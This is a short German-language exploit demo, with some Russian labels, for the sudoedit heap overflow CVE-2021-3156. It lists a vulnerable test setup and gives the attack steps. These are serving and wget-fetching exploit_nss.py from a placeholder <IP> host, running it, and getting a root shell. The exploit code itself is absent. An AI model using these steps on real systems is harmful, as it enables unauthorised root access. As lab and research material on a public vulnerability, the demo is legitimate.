
CVE-2021-3156-Exploit-Demo
📅 Datum: 2025-06-08
✍️ Autor: @TopskiyPavelQwertyGang
🧠 Security Researcher | Red Team Enthusiast
sudoedit (sudo)Heap-Overflow in sudoedit ermöglicht es einem lokalen Benutzer, root-Zugriff zu erlangen, wenn der Befehl sudoedit mit vorbereiteten Parametern ausgeführt wird.
Der Exploit ist aktiv für sudo-Versionen < 1.9.5p2, einschließlich gängiger Ubuntu-/Debian-/CentOS-Images.
Selbst bei aktiviertem ASLR bleibt die Schwachstelle ausnutzbar.
OS : Ubuntu 20.04.3 LTS
glibc : 2.31 (tcache ON)
sudo : 1.8.31 (уязвим)
ASLR : 2 (включён)
glibc und sudo:ldd --version
sudo --version
python3 -m http.server 80
wget http://<IP>:80/exploit_nss.py
python3 exploit_nss.py
$ python3 exploit_nss.py
# whoami
root
Die Ausnutzung von CVE-2021-3156 bleibt selbst bei aktivem ASLR möglich, wenn glibc ≥ 2.26 und eine anfällige Version von sudo vorliegt.
Am stabilsten erwies sich der Exploit exploit_nss.py, der bei korrekter NSS-Konfiguration beim ersten Mal funktioniert.
🧨 System unter Kontrolle.